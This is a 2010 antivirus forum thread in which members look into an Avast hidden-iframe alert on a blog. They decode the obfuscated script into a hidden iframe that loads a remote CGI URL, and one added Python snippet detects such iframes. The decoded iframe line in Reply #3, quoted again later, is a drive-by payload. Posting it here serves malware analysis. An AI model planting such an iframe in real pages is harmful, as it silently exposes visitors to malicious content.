Author Topic: Really infected via tweetmeme or only part of the code flagged?  (Read 7294 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33905
  • malware fighter
Hi malware fighters,

I got a "Sign of "HTML:iFrame - FW [Trj]" has been found in "...."" by avast.
But when I scan the site with Wepawet I get "benign" as a result, see here:
http://wepawet.iseclab.org/view.php?hash=6e67c2014e0b33bb0aadf3655d28e5e5&t=1269893173&type=js
Then an unmasked parasites check gives the site as clean;
Norton Safe Web also produces an all green for this site;
Investigating further into what could be the culprit of this I got
iFrames found (novirusthanks iFrame checker):
hxtp://api.tweetmeme.com/button.js?url=hxtp%3A%2F%2Fwww.prelovac.com%2Fvladimir%2Fwarning-website-virus-attack&source=vprelovac&style=compact&service=su.pr
Guess this was what avast flagged? Because a redirect to malcode via tweetmeme was found,
a method recently often used to redirect to malicious software (Gzip-data).
Complete iFrame report:
No zeroiframes detected!
Check took 5.92 seconds

(Level: 0) Url checked:
hxtp://www.prelovac.com/vladimir/warning-website-virus-attack
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htxtp://api.tweetmeme.com/button.js?url=http://www.prelovac.com/vladimir/warning-website-virus-attack&source=vprelovac&style=compact&service=su.pr
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/jquery/jquery.js?ver=1.3.2
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/comment-reply.js?ver=20090102
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-content/themes/imbue/library/scripts/thematic-dropdowns.js
Zeroiframes detected on this site: 0
No ad codes identified
Now the results:
Only avast and GData give the site as infected here:
http://scanner.novirusthanks.org/analysis/8e932819aeb409f8fead77b151bf1309/d2FybmluZy13ZWJzaXRlLXZpcnVzLWF0dGFj/
Avast     100328-0    4.8.1368          HTML:IFrame-FW [Trj]
G-Data    19.9309     2.0.7309.847      HTML:IFrame-FW [Trj] B
chapeau avast!  :)

polonus
« Last Edit: March 31, 2010, 10:12:15 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

psw

  • Guest
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #1 on: March 30, 2010, 05:28:42 AM »
Problem is that this Avast message corresponds to a chunk of binary code analyzed by the gzip unpacker. This binary code can be found in the _avast5_ subdirectory of the system TEMP as an unpXXXXXX.tmp file. This file is present while the Avast virus warning message is displayed. Scanning this file with the File System Shield gives the same warning message. So the key question is what this chunk of binary code is - FP or not?

P.S. This is the virustotal result of the binary code analysis
http://www.virustotal.com/ru/analisis/883592905728d82e97ea2e99110eae30f278f641e9518df06e634c46573cc03c-1269920524
« Last Edit: March 30, 2010, 05:44:14 AM by psw »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33905
  • malware fighter
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #2 on: March 30, 2010, 08:54:15 PM »
Hi psw,

I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

pozdrawiam,

Damian

psw

  • Guest
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #3 on: March 30, 2010, 10:56:18 PM »
I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

This code is reduced to the following:
<iframe src='hXXp://trueringtones.net/search.cgi?baagirl&'+Math.round(Math.random()*6369)+'20' width=11 height=579 style='display: none'></iframe>
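
As an added example (not code from this thread or from any of the tools mentioned in it), a small Python heuristic that flags iframes of the shape psw decoded above: hidden by CSS, tiny, a random number spliced into the src so every visit fetches a fresh copy, pointing at a CGI endpoint. The sample tags, the host names in them and the TINY_PX threshold are constructed assumptions for the demonstration.

```python
import re

# Constructed sample input (not taken from the thread): an iframe of the same
# shape psw decoded, with a placeholder host instead of the real one. The JS
# fragment in the middle appends a random number to the URL on every load.
SAMPLE_DECODED = (
    "<iframe src='http://loader.example.invalid/search.cgi?kw&'"
    "+Math.round(Math.random()*6369)+'20'"
    " width=11 height=579 style='display: none'></iframe>"
)

# Constructed benign iframe for contrast: visible, fixed URL, normal size.
SAMPLE_CLEAN = "<iframe src='https://video.example.invalid/embed/42' width=560 height=315></iframe>"

IFRAME_RE = re.compile(r"<\s*iframe\b(?P<attrs>[^>]*)>", re.IGNORECASE)
TINY_PX = 20  # assumed heuristic threshold: a frame this small is not meant to be seen


def iframe_findings(html):
    """Return [(tag_text, [reasons])] for each iframe that looks like a drive-by loader.

    Heuristics: hidden via CSS, tiny width/height, a random value spliced into
    the src (cache-busting), and a .cgi endpoint with a query string, which is
    the combination seen in the decoded tag in this thread.
    """
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = m.group("attrs")
        reasons = []
        if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", attrs, re.I):
            reasons.append("hidden via CSS")
        dims = re.findall(r"\b(width|height)\s*=\s*['\"]?(\d+)", attrs, re.I)
        if any(int(v) <= TINY_PX for _, v in dims):
            reasons.append("tiny dimensions")
        if re.search(r"Math\.random\s*\(", attrs):
            reasons.append("random value spliced into src")
        src = re.search(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", attrs, re.I)
        if src and ".cgi?" in src.group(1):
            reasons.append("CGI endpoint with query string")
        if reasons:
            findings.append((m.group(0), reasons))
    return findings


def is_suspicious(html, min_reasons=2):
    """True if any iframe trips at least min_reasons heuristics (one alone is weak evidence)."""
    return any(len(r) >= min_reasons for _, r in iframe_findings(html))


if __name__ == "__main__":
    for tag, reasons in iframe_findings(SAMPLE_DECODED):
        print(tag, "->", ", ".join(reasons))
```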

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33905
  • malware fighter
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #4 on: March 30, 2010, 11:24:45 PM »
Hi psw,

For this see: http://jsunpack.jeek.org/dec/go?report=f6384d3da0d85932713de7cc55c20861a234a906

The unobfuscated data you gave produced wrong parameters and errors (must be on purpose); what actually happens when you run it is that you get a redirect to hxtp://www.hugedomains/com/domain_profile.cfm?d=trueringtonese =netdetected

polonus

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89065
  • No support PMs thanks
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #5 on: March 31, 2010, 12:47:59 AM »
I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

This code is reduced to the following:
<i f r a m e src='hXXp: / / truerin___ ____gtones.net/search.cgi?baagirl&'+Math.rou nd(Math.rand om()*6369)+'20' width=11 hei ght=579 style='dis play: no ne'>< / i f r a m e >

Posting the actual suspect tag, even with the very slight change hXXp could still result in either the web shield or network shield alerting in the topic. So it is better to use images when posting code to avoid the accidental triggering of the web shield.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

rebies

  • Guest
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #6 on: April 18, 2010, 12:39:13 AM »
Hi guys.  We bought this domain back in September, 2009.  I assume the previous owner was using it for some sort of virus as it sounds you are suggesting?  If you could help me understand what you are saying that would be great.  Overall I know we don't use cgi scripts on our site.  As a domain we own I want to be sure there is nothing we can do on our end...

Thanks.

rebies

  • Guest
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #7 on: April 18, 2010, 12:41:15 AM »
Sorry - meant to say the domain - trueringtones . net

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89065
  • No support PMs thanks
Re: Really infected via tweetmeme or only part of the code flagged?
« Reply #8 on: April 18, 2010, 01:14:39 AM »
I don't know if it has anything to do directly with the domain, but rather the method of obfuscation (image in Reply #s above) of the code employed to generate this iframe and link to display a hidden iframe and import data from trueringtones (which appears to be up for sale).

However avast isn't alone in thinking it is suspect, firefox safe browsing considers it an attack site.
« Last Edit: April 18, 2010, 01:16:38 AM by DavidR »